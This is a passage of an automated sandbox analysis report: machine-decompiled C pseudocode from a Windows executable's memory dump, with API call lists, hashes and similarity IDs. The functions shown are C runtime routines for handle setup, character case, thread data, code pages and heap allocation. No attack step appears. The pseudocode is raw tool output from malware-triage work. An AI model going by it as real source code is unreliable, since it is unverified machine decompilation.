                              					_t89[2] = _t89[2] & 0x00000000;
                              					_t89[1] = 0xa;
                              					_t70 =  *0x425900; // 0x2050630
                              					_t89 =  &(_t89[9]);
                              					_t48 =  &(_t70[0x120]);
                              				}
                              				GetStartupInfoA( &_v76);
                              				__eflags = _v76.cbReserved2;
                              				if(_v76.cbReserved2 == 0) {
                              					L25:
                              					_t72 = 0;
                              					__eflags = 0;
                              					do {
                              						_t75 =  *0x425900; // 0x2050630
                              						_t50 = _t72 + _t72 * 8;
                              						__eflags = _t75[_t50] - 0xffffffff;
                              						_t90 =  &(_t75[_t50]);
                              						if(_t75[_t50] != 0xffffffff) {
                              							_t45 =  &(_t90[1]);
                              							 *_t45 = _t90[1] | 0x00000080;
                              							__eflags =  *_t45;
                              							goto L37;
                              						}
                              						__eflags = _t72;
                              						_t90[1] = 0x81;
                              						if(_t72 != 0) {
                              							asm("sbb eax, eax");
                              							_t55 =  ~(_t72 - 1) + 0xfffffff5;
                              							__eflags = _t55;
                              						} else {
                              							_t55 = 0xfffffff6;
                              						}
                              						_t87 = GetStdHandle(_t55);
                              						__eflags = _t87 - 0xffffffff;
                              						if(_t87 == 0xffffffff) {
                              							L33:
                              							_t90[1] = _t90[1] | 0x00000040;
                              						} else {
                              							_t57 = GetFileType(_t87);
                              							__eflags = _t57;
                              							if(_t57 == 0) {
                              								goto L33;
                              							}
                              							_t58 = _t57 & 0x000000ff;
                              							 *_t90 = _t87;
                              							__eflags = _t58 - 2;
                              							if(_t58 != 2) {
                              								__eflags = _t58 - 3;
                              								if(_t58 == 3) {
                              									_t90[1] = _t90[1] | 0x00000008;
                              								}
                              								goto L37;
                              							}
                              							goto L33;
                              						}
                              						L37:
                              						_t72 = _t72 + 1;
                              						__eflags = _t72 - 3;
                              					} while (_t72 < 3);
                              					return SetHandleCount( *0x425a00);
                              				}
                              				_t59 = _v76.lpReserved2;
                              				__eflags = _t59;
                              				if(_t59 == 0) {
                              					goto L25;
                              				}
                              				_t88 =  *_t59;
                              				_t73 = _t59 + 4;
                              				_v8 = _t73 + _t88;
                              				__eflags = _t88 - 0x800;
                              				if(_t88 >= 0x800) {
                              					_t88 = 0x800;
                              				}
                              				__eflags =  *0x425a00 - _t88; // 0x20
                              				if(__eflags >= 0) {
                              					L18:
                              					_t91 = 0;
                              					__eflags = _t88;
                              					if(_t88 <= 0) {
                              						goto L25;
                              					} else {
                              						goto L19;
                              					}
                              					do {
                              						L19:
                              						_t76 =  *_v8;
                              						__eflags = _t76 - 0xffffffff;
                              						if(_t76 == 0xffffffff) {
                              							goto L24;
                              						}
                              						_t63 =  *_t73;
                              						__eflags = _t63 & 0x00000001;
                              						if((_t63 & 0x00000001) == 0) {
                              							goto L24;
                              						}
                              						__eflags = _t63 & 0x00000008;
                              						if((_t63 & 0x00000008) != 0) {
                              							L23:
                              							_t65 = _t91 & 0x0000001f;
                              							__eflags = _t65;
                              							_t67 =  &(0x425900[_t91 >> 5][_t65 + _t65 * 8]);
                              							 *_t67 =  *_v8;
                              							_t67[1] =  *_t73;
                              							goto L24;
                              						}
                              						_t68 = GetFileType(_t76);
                              						__eflags = _t68;
                              						if(_t68 == 0) {
                              							goto L24;
                              						}
                              						goto L23;
                              						L24:
                              						_v8 =  &(_v8[1]);
                              						_t91 = _t91 + 1;
                              						_t73 = _t73 + 1;
                              						__eflags = _t91 - _t88;
                              					} while (_t91 < _t88);
                              					goto L25;
                              				} else {
                              					_t92 = 0x425904;
                              					while(1) {
                              						_t69 = E00413E65(0x480);
                              						__eflags = _t69;
                              						if(_t69 == 0) {
                              							break;
                              						}
                              						 *0x425a00 =  *0x425a00 + 0x20;
                              						__eflags =  *0x425a00;
                              						 *_t92 = _t69;
                              						_t13 = _t69 + 0x480; // 0x480
                              						_t84 = _t13;
                              						while(1) {
                              							__eflags = _t69 - _t84;
                              							if(_t69 >= _t84) {
                              								break;
                              							}
                              							 *(_t69 + 4) =  *(_t69 + 4) & 0x00000000;
                              							 *_t69 =  *_t69 | 0xffffffff;
                              							 *(_t69 + 8) =  *(_t69 + 8) & 0x00000000;
                              							 *((char*)(_t69 + 5)) = 0xa;
                              							_t69 = _t69 + 0x24;
                              							_t84 =  *_t92 + 0x480;
                              						}
                              						_t92 =  &(_t92[1]);
                              						__eflags =  *0x425a00 - _t88; // 0x20
                              						if(__eflags < 0) {
                              							continue;
                              						}
                              						goto L18;
                              					}
                              					_t88 =  *0x425a00; // 0x20
                              					goto L18;
                              				}
                              			}

                              APIs
                              • GetStartupInfoA.KERNEL32(?), ref: 0041769F
                              • GetFileType.KERNEL32(?,?,00000000), ref: 0041774A
                              • GetStdHandle.KERNEL32(-000000F6,?,00000000), ref: 004177AD
                              • GetFileType.KERNEL32(00000000,?,00000000), ref: 004177BB
                              • SetHandleCount.KERNEL32 ref: 004177F2
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: FileHandleType$CountInfoStartup
                              • String ID:
                              • API String ID: 1710529072-0
                              • Opcode ID: 8c6679148f64bb77278d6d77b9368511d7cfe70b0cd8573ea2dfe0e7b80ae48f
                              • Instruction ID: 1521dec5194d53324a877df202082dadc936f581ec6971422c000dc394b087b4
                              • Opcode Fuzzy Hash: 8c6679148f64bb77278d6d77b9368511d7cfe70b0cd8573ea2dfe0e7b80ae48f
                              • Instruction Fuzzy Hash: 39510B716086458FC7208B28D8847A67BB0FB11378F65866ED5B2C72E0D738A886C759
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 83%
                              			E00403AA7(signed int __ecx) {
                              				short _v6;
                              				char _v12;
                              				short _t12;
                              				short _t27;
                              				int _t29;
                              				void* _t30;
                              
                              				_push(__ecx);
                              				_push(__ecx);
                              				_v6 = __ecx;
                              				if(__ecx != 0) {
                              					_t27 = CharUpperW(__ecx & 0x0000ffff);
                              					if(_t27 != 0 || GetLastError() != 0x78) {
                              						_t12 = _t27;
                              					} else {
                              						_t29 = WideCharToMultiByte(0, 0,  &_v6, 1,  &_v12, 4, 0, 0);
                              						if(_t29 != 0 && _t29 <= 4) {
                              							 *((char*)(_t30 + _t29 - 8)) = 0;
                              							CharUpperA( &_v12);
                              							MultiByteToWideChar(0, 0,  &_v12, _t29,  &_v6, 1);
                              						}
                              						_t12 = _v6;
                              					}
                              				} else {
                              					_t12 = 0;
                              				}
                              				return _t12;
                              			}

                              APIs
                              • CharUpperW.USER32(00000000,00000000,?,00000000,00000000,?,00403B6F), ref: 00403AC2
                              • GetLastError.KERNEL32(?,00000000,00000000,?,00403B6F), ref: 00403ACE
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,00000004,00000000,00000000,?,00000000,00000000,?,00403B6F), ref: 00403AE9
                              • CharUpperA.USER32(?,?,00000000,00000000,?,00403B6F), ref: 00403B02
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,00000001,?,00000000,00000000,?,00403B6F), ref: 00403B15
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: Char$ByteMultiUpperWide$ErrorLast
                              • String ID:
                              • API String ID: 3939315453-0
                              • Opcode ID: 209c94fe8e33f847f2405d3a9712247a1b8bb9216b5908a8917fe0bd7a80c077
                              • Instruction ID: 0842cb939f6927aecb542cd9758d214692c03acffe84293a02396fd76ee0080f
                              • Opcode Fuzzy Hash: 209c94fe8e33f847f2405d3a9712247a1b8bb9216b5908a8917fe0bd7a80c077
                              • Instruction Fuzzy Hash: B30144B65001197ADB20ABE49CC9DEBBA7CDB08259F414572F942A3281E3756E4487B8
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00415523() {
                              				void _t10;
                              				long _t15;
                              				void* _t16;
                              
                              				_t15 = GetLastError();
                              				_t16 = TlsGetValue( *0x420740);
                              				if(_t16 == 0) {
                              					_t16 = E00416EFC(1, 0x74);
                              					if(_t16 == 0 || TlsSetValue( *0x420740, _t16) == 0) {
                              						E00414C0C(0x10);
                              					} else {
                              						E00415510(_t16);
                              						_t10 = GetCurrentThreadId();
                              						 *(_t16 + 4) =  *(_t16 + 4) | 0xffffffff;
                              						 *_t16 = _t10;
                              					}
                              				}
                              				SetLastError(_t15);
                              				return _t16;
                              			}







                              APIs
                              • GetLastError.KERNEL32(00000103,7FFFFFFF,00416EEF,00417BBE,00000000,?,?,00000000,00000001), ref: 00415525
                              • TlsGetValue.KERNEL32(?,?,00000000,00000001), ref: 00415533
                              • SetLastError.KERNEL32(00000000,?,?,00000000,00000001), ref: 0041557F
                                • Part of subcall function 00416EFC: HeapAlloc.KERNEL32(00000008,?,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00416FF2
                              • TlsSetValue.KERNEL32(00000000,?,?,00000000,00000001), ref: 00415557
                              • GetCurrentThreadId.KERNEL32 ref: 00415568
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: ErrorLastValue$AllocCurrentHeapThread
                              • String ID:
                              • API String ID: 2020098873-0
                              • Opcode ID: 86968800811f432393852c2012b1ac292949c56105930e45964c9f1db916a728
                              • Instruction ID: cede6b9146d9eee740ee2dfbc4b23865fcca372efd47330e9e203dd76af2c63a
                              • Opcode Fuzzy Hash: 86968800811f432393852c2012b1ac292949c56105930e45964c9f1db916a728
                              • Instruction Fuzzy Hash: 09F09635A01611BBC7312B74AC096DB3E62EB857A1B51413AF551962A4DB28888196EC
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 92%
                              			E00417E3A(int _a4) {
                              				signed int _v8;
                              				char _v21;
                              				char _v22;
                              				struct _cpinfo _v28;
                              				void* __ebx;
                              				void* __edi;
                              				intOrPtr* _t36;
                              				signed int _t40;
                              				signed int _t41;
                              				int _t43;
                              				signed int _t47;
                              				signed int _t49;
                              				int _t50;
                              				signed char* _t51;
                              				signed int _t55;
                              				signed char* _t57;
                              				signed int _t60;
                              				intOrPtr* _t63;
                              				signed int _t65;
                              				signed char _t66;
                              				signed char _t68;
                              				signed char _t69;
                              				signed int _t70;
                              				void* _t71;
                              				signed int _t74;
                              				signed int _t77;
                              				signed int _t79;
                              				signed int _t81;
                              				void* _t85;
                              
                              				E0041570A(0x19);
                              				_t50 = E00417FE7(_a4);
                              				_t85 = _t50 -  *0x4256c8; // 0x4e4
                              				_a4 = _t50;
                              				if(_t85 != 0) {
                              					__eflags = _t50;
                              					if(_t50 == 0) {
                              						L30:
                              						E00418064();
                              					} else {
                              						_t65 = 0;
                              						__eflags = 0;
                              						_t36 = 0x422af8;
                              						while(1) {
                              							__eflags =  *_t36 - _t50;
                              							if( *_t36 == _t50) {
                              								break;
                              							}
                              							_t36 = _t36 + 0x30;
                              							_t65 = _t65 + 1;
                              							__eflags = _t36 - 0x422be8;
                              							if(_t36 < 0x422be8) {
                              								continue;
                              							} else {
                              								_t43 = GetCPInfo(_t50,  &_v28);
                              								_t81 = 1;
                              								__eflags = _t43 - _t81;
                              								if(_t43 != _t81) {
                              									__eflags =  *0x423510;
                              									if( *0x423510 == 0) {
                              										_t77 = _t81 | 0xffffffff;
                              										__eflags = _t77;
                              									} else {
                              										goto L30;
                              									}
                              								} else {
                              									 *0x4258e4 =  *0x4258e4 & 0x00000000;
                              									_t60 = 0x40;
                              									__eflags = _v28 - _t81;
                              									memset(0x4257e0, 0, _t60 << 2);
                              									asm("stosb");
                              									 *0x4256c8 = _t50;
                              									if(__eflags <= 0) {
                              										 *0x4256dc =  *0x4256dc & 0x00000000;
                              										__eflags =  *0x4256dc;
                              									} else {
                              										__eflags = _v22;
                              										if(_v22 != 0) {
                              											_t63 =  &_v21;
                              											while(1) {
                              												_t69 =  *_t63;
                              												__eflags = _t69;
                              												if(_t69 == 0) {
                              													goto L24;
                              												}
                              												_t49 =  *(_t63 - 1) & 0x000000ff;
                              												_t70 = _t69 & 0x000000ff;
                              												while(1) {
                              													__eflags = _t49 - _t70;
                              													if(_t49 > _t70) {
                              														break;
                              													}
                              													 *(_t49 + 0x4257e1) =  *(_t49 + 0x4257e1) | 0x00000004;
                              													_t49 = _t49 + 1;
                              												}
                              												_t63 = _t63 + 2;
                              												__eflags =  *(_t63 - 1);
                              												if( *(_t63 - 1) != 0) {
                              													continue;
                              												}
                              												goto L24;
                              											}
                              										}
                              										L24:
                              										_t47 = _t81;
                              										do {
                              											 *(_t47 + 0x4257e1) =  *(_t47 + 0x4257e1) | 0x00000008;
                              											_t47 = _t47 + 1;
                              											__eflags = _t47 - 0xff;
                              										} while (_t47 < 0xff);
                              										 *0x4258e4 = E00418031(_t50);
                              										 *0x4256dc = _t81;
                              									}
                              									_t71 = 0x4256d0;
                              									asm("stosd");
                              									asm("stosd");
                              									asm("stosd");
                              									L31:
                              									E0041808D(_t50, _t71);
                              									goto L1;
                              								}
                              							}
                              							goto L33;
                              						}
                              						_v8 = _v8 & 0x00000000;
                              						_t55 = 0x40;
                              						memset(0x4257e0, 0, _t55 << 2);
                              						_t79 = _t65 + _t65 * 2 << 4;
                              						__eflags = _t79;
                              						asm("stosb");
                              						_t16 = _t79 + 0x422b08; // 0x422b08
                              						_t51 = _t16;
                              						do {
                              							__eflags =  *_t51;
                              							_t57 = _t51;
                              							if( *_t51 != 0) {
                              								while(1) {
                              									_t17 =  &(_t57[1]); // 0xdf
                              									_t66 =  *_t17;
                              									__eflags = _t66;
                              									if(_t66 == 0) {
                              										goto L21;
                              									}
                              									_t41 =  *_t57 & 0x000000ff;
                              									_t74 = _t66 & 0x000000ff;
                              									__eflags = _t41 - _t74;
                              									if(_t41 <= _t74) {
                              										_t19 = _v8 + 0x422af0; // 0x8040201
                              										_t68 =  *_t19;
                              										do {
                              											 *(_t41 + 0x4257e1) =  *(_t41 + 0x4257e1) | _t68;
                              											_t41 = _t41 + 1;
                              											__eflags = _t41 - _t74;
                              										} while (_t41 <= _t74);
                              									}
                              									_t57 =  &(_t57[2]);
                              									__eflags =  *_t57;
                              									if( *_t57 != 0) {
                              										continue;
                              									}
                              									goto L21;
                              								}
                              							}
                              							L21:
                              							_v8 = _v8 + 1;
                              							_t51 =  &(_t51[8]);
                              							__eflags = _v8 - 4;
                              						} while (_v8 < 4);
                              						 *0x4256dc = 1;
                              						 *0x4256c8 = _a4;
                              						_t40 = E00418031(_a4);
                              						_t71 = 0x4256d0;
                              						asm("movsd");
                              						asm("movsd");
                              						 *0x4258e4 = _t40;
                              						asm("movsd");
                              					}
                              					goto L31;
                              				} else {
                              					L1:
                              					_t77 = 0;
                              				}
                              				L33:
                              				E0041576B(0x19);
                              				return _t77;
                              			}

































                              APIs
                                • Part of subcall function 0041570A: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00415747
                                • Part of subcall function 0041570A: EnterCriticalSection.KERNEL32(?,?,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00415762
                              • GetCPInfo.KERNEL32(00000000,?,?,00000000,00000000,?,?,00414BA4), ref: 00417E8B
                                • Part of subcall function 0041576B: LeaveCriticalSection.KERNEL32(?,00413F70,00000009,00413F5C,00000000,?,00000000,00000000,00000000), ref: 00415778
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: CriticalSection$EnterInfoInitializeLeave
                              • String ID: +B$WB$WB
                              • API String ID: 1866836854-4076192905
                              • Opcode ID: ee95e9d0b24a19a0cc788d9683df54c17a7a80f6c3da06404699baeb333cbe61
                              • Instruction ID: 91cfe2518806d3d9ee68befd2fe7c4d9c34af4d87c59522c175cbc6726151178
                              • Opcode Fuzzy Hash: ee95e9d0b24a19a0cc788d9683df54c17a7a80f6c3da06404699baeb333cbe61
                              • Instruction Fuzzy Hash: FC41243164C654AEE720DB24D8853EB7BF1AB05314FB4406BE5488B291CABD49C7C74C
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 68%
                              			E0041458F(void* _a4, long _a8) {
                              				signed int _v8;
                              				intOrPtr _v20;
                              				long _v36;
                              				void* _v40;
                              				intOrPtr _v44;
                              				char _v48;
                              				long _v52;
                              				long _v56;
                              				char _v60;
                              				intOrPtr _t56;
                              				void* _t57;
                              				long _t58;
                              				long _t59;
                              				long _t63;
                              				long _t66;
                              				long _t68;
                              				long _t71;
                              				long _t72;
                              				long _t74;
                              				long _t78;
                              				intOrPtr _t80;
                              				void* _t83;
                              				long _t85;
                              				long _t88;
                              				void* _t89;
                              				long _t91;
                              				intOrPtr _t93;
                              				void* _t97;
                              				void* _t104;
                              				long _t113;
                              				long _t116;
                              				intOrPtr _t122;
                              				void* _t123;
                              
                              				_push(0xffffffff);
                              				_push(0x41b9b8);
                              				_push(E00414A2C);
                              				_push( *[fs:0x0]);
                              				 *[fs:0x0] = _t122;
                              				_t123 = _t122 - 0x28;
                              				_t97 = _a4;
                              				_t113 = 0;
                              				if(_t97 != 0) {
                              					_t116 = _a8;
                              					__eflags = _t116;
                              					if(_t116 != 0) {
                              						_t56 =  *0x425a38; // 0x1
                              						__eflags = _t56 - 3;
                              						if(_t56 != 3) {
                              							__eflags = _t56 - 2;
                              							if(_t56 != 2) {
                              								while(1) {
                              									_t57 = 0;
                              									__eflags = _t116 - 0xffffffe0;
                              									if(_t116 <= 0xffffffe0) {
                              										__eflags = _t116 - _t113;
                              										if(_t116 == _t113) {
                              											_t116 = 1;
                              										}
                              										_t116 = _t116 + 0x0000000f & 0xfffffff0;
                              										__eflags = _t116;
                              										_t57 = HeapReAlloc( *0x425a34, _t113, _t97, _t116);
                              									}
                              									__eflags = _t57 - _t113;
                              									if(_t57 != _t113) {
                              										goto L64;
                              									}
                              									__eflags =  *0x4233b4 - _t113; // 0x0
                              									if(__eflags == 0) {
                              										goto L64;
                              									}
                              									_t58 = E00415868(_t116);
                              									__eflags = _t58;
                              									if(_t58 != 0) {
                              										continue;
                              									}
                              									goto L63;
                              								}
                              								goto L64;
                              							}
                              							__eflags = _t116 - 0xffffffe0;
                              							if(_t116 <= 0xffffffe0) {
                              								__eflags = _t116;
                              								if(_t116 <= 0) {
                              									_t116 = 0x10;
                              								} else {
                              									_t116 = _t116 + 0x0000000f & 0xfffffff0;
                              								}
                              								_a8 = _t116;
                              							}
                              							while(1) {
                              								_v40 = _t113;
                              								__eflags = _t116 - 0xffffffe0;
                              								if(_t116 <= 0xffffffe0) {
                              									E0041570A(9);
                              									_pop(_t104);
                              									_v8 = 1;
                              									_t63 = E004167F8(_t97,  &_v60,  &_v48);
                              									_t123 = _t123 + 0xc;
                              									_t113 = _t63;
                              									_v52 = _t113;
                              									__eflags = _t113;
                              									if(_t113 == 0) {
                              										_v40 = HeapReAlloc( *0x425a34, 0, _t97, _t116);
                              									} else {
                              										__eflags = _t116 -  *0x42283c; // 0x1e0
                              										if(__eflags < 0) {
                              											_t100 = _t116 >> 4;
                              											_t71 = E00416BC0(_t104, _v60, _v48, _t113, _t116 >> 4);
                              											_t123 = _t123 + 0x10;
                              											__eflags = _t71;
                              											if(_t71 == 0) {
                              												_t72 = E00416894(_t104, _t100);
                              												_v40 = _t72;
                              												__eflags = _t72;
                              												if(_t72 != 0) {
                              													_t74 = ( *_t113 & 0x000000ff) << 4;
                              													_v56 = _t74;
                              													__eflags = _t74 - _t116;
                              													if(_t74 >= _t116) {
                              														_t74 = _t116;
                              													}
                              													E00414090(_v40, _a4, _t74);
                              													E0041684F(_v60, _v48, _t113);
                              													_t123 = _t123 + 0x18;
                              												}
                              											} else {
                              												_v40 = _a4;
                              											}
                              											_t97 = _a4;
                              										}
                              										__eflags = _v40;
                              										if(_v40 == 0) {
                              											_t66 = HeapAlloc( *0x425a34, 0, _t116);
                              											_v40 = _t66;
                              											__eflags = _t66;
                              											if(_t66 != 0) {
                              												_t68 = ( *_t113 & 0x000000ff) << 4;
                              												_v56 = _t68;
                              												__eflags = _t68 - _t116;
                              												if(_t68 >= _t116) {
                              													_t68 = _t116;
                              												}
                              												E00414090(_v40, _t97, _t68);
                              												E0041684F(_v60, _v48, _t113);
                              												_t123 = _t123 + 0x18;
                              											}
                              										}
                              									}
                              									_t51 =  &_v8;
                              									 *_t51 = _v8 | 0xffffffff;
                              									__eflags =  *_t51;
                              									E00414868();
                              								}
                              								_t57 = _v40;
                              								__eflags = _t57 - _t113;
                              								if(_t57 != _t113) {
                              									goto L64;
                              								}
                              								__eflags =  *0x4233b4 - _t113; // 0x0
                              								if(__eflags == 0) {
                              									goto L64;
                              								}
                              								_t59 = E00415868(_t116);
                              								__eflags = _t59;
                              								if(_t59 != 0) {
                              									continue;
                              								}
                              								goto L63;
                              							}
                              							goto L64;
                              						} else {
                              							goto L5;
                              						}
                              						do {
                              							L5:
                              							_v40 = _t113;
                              							__eflags = _t116 - 0xffffffe0;
                              							if(_t116 > 0xffffffe0) {
                              								L25:
                              								_t57 = _v40;
                              								__eflags = _t57 - _t113;
                              								if(_t57 != _t113) {
                              									goto L64;
                              								}
                              								__eflags =  *0x4233b4 - _t113; // 0x0
                              								if(__eflags == 0) {
                              									goto L64;
                              								}
                              								goto L27;
                              							}
                              							E0041570A(9);
                              							_v8 = _t113;
                              							_t80 = E00415A9D(_t97);
                              							_v44 = _t80;
                              							__eflags = _t80 - _t113;
                              							if(_t80 == _t113) {
                              								L21:
                              								_v8 = _v8 | 0xffffffff;
                              								E0041471A();
                              								__eflags = _v44 - _t113;
                              								if(_v44 == _t113) {
                              									__eflags = _t116 - _t113;
                              									if(_t116 == _t113) {
                              										_t116 = 1;
                              									}
                              									_t116 = _t116 + 0x0000000f & 0xfffffff0;
                              									__eflags = _t116;
                              									_a8 = _t116;
                              									_v40 = HeapReAlloc( *0x425a34, _t113, _t97, _t116);
                              								}
                              								goto L25;
                              							}
                              							__eflags = _t116 -  *0x425a30; // 0x0
                              							if(__eflags <= 0) {
                              								_push(_t116);
                              								_push(_t97);
                              								_push(_t80);
                              								_t88 = E004162A6();
                              								_t123 = _t123 + 0xc;
                              								__eflags = _t88;
                              								if(_t88 == 0) {
                              									_push(_t116);
                              									_t89 = E00415DF1();
                              									_v40 = _t89;
                              									__eflags = _t89 - _t113;
                              									if(_t89 != _t113) {
                              										_t91 =  *((intOrPtr*)(_t97 - 4)) - 1;
                              										_v36 = _t91;
                              										__eflags = _t91 - _t116;
                              										if(_t91 >= _t116) {
                              											_t91 = _t116;
                              										}
                              										E00414090(_v40, _t97, _t91);
                              										_t93 = E00415A9D(_t97);
                              										_v44 = _t93;
                              										_push(_t97);
                              										_push(_t93);
                              										E00415AC8();
                              										_t123 = _t123 + 0x18;
                              									}
                              								} else {
                              									_v40 = _t97;
                              								}
                              							}
                              							__eflags = _v40 - _t113;
                              							if(_v40 == _t113) {
                              								__eflags = _t116 - _t113;
                              								if(_t116 == _t113) {
                              									_t116 = 1;
                              									_a8 = _t116;
                              								}
                              								_t116 = _t116 + 0x0000000f & 0xfffffff0;
                              								_a8 = _t116;
                              								_t83 = HeapAlloc( *0x425a34, _t113, _t116);
                              								_v40 = _t83;
                              								__eflags = _t83 - _t113;
                              								if(_t83 != _t113) {
                              									_t85 =  *((intOrPtr*)(_t97 - 4)) - 1;
                              									_v36 = _t85;
                              									__eflags = _t85 - _t116;
                              									if(_t85 >= _t116) {
                              										_t85 = _t116;
                              									}
                              									E00414090(_v40, _t97, _t85);
                              									_push(_t97);
                              									_push(_v44);
                              									E00415AC8();
                              									_t123 = _t123 + 0x14;
                              								}
                              							}
                              							goto L21;
                              							L27:
                              							_t78 = E00415868(_t116);
                              							__eflags = _t78;
                              						} while (_t78 != 0);
                              						goto L63;
                              					} else {
                              						E00413F9F(_t97);
                              						L63:
                              						_t57 = 0;
                              						__eflags = 0;
                              						goto L64;
                              					}
                              				} else {
                              					_t57 = E00413E65(_a8);
                              					L64:
                              					 *[fs:0x0] = _v20;
                              					return _t57;
                              				}
                              			}





































                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 97048a31ed7e8673145bc5a0b9288faae4c75299d979c6b38067687c3c285a89
                              • Instruction ID: b0a20c71c01645f6642c62949d543ab21d76ee58160ce25a59b39075e73dd19d
                              • Opcode Fuzzy Hash: 97048a31ed7e8673145bc5a0b9288faae4c75299d979c6b38067687c3c285a89
                              • Instruction Fuzzy Hash: 4691E671D01514ABCB21AB69DC85ADEBBB4EFC5764F240227F818B62D0D7398DC1CA6C
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E0041659C() {
                              				void* _t25;
                              				intOrPtr* _t28;
                              				void* _t42;
                              				void* _t43;
                              				void* _t45;
                              				void* _t55;
                              
                              				if( *0x420828 != 0xffffffff) {
                              					_t43 = HeapAlloc( *0x425a34, 0, 0x2020);
                              					if(_t43 == 0) {
                              						goto L20;
                              					}
                              					goto L3;
                              				} else {
                              					_t43 = 0x420818;
                              					L3:
                              					_t42 = VirtualAlloc(0, 0x400000, 0x2000, 4);
                              					if(_t42 == 0) {
                              						L18:
                              						if(_t43 != 0x420818) {
                              							HeapFree( *0x425a34, 0, _t43);
                              						}
                              						L20:
                              						return 0;
                              					}
                              					if(VirtualAlloc(_t42, 0x10000, 0x1000, 4) == 0) {
                              						VirtualFree(_t42, 0, 0x8000);
                              						goto L18;
                              					}
                              					if(_t43 != 0x420818) {
                              						 *_t43 = 0x420818;
                              						_t25 =  *0x42081c; // 0x420818
                              						 *(_t43 + 4) = _t25;
                              						 *0x42081c = _t43;
                              						 *( *(_t43 + 4)) = _t43;
                              					} else {
                              						if( *0x420818 == 0) {
                              							 *0x420818 = 0x420818;
                              						}
                              						if( *0x42081c == 0) {
                              							 *0x42081c = 0x420818;
                              						}
                              					}
                              					_t3 = _t42 + 0x400000; // 0x400000
                              					_t4 = _t43 + 0x98; // 0x98
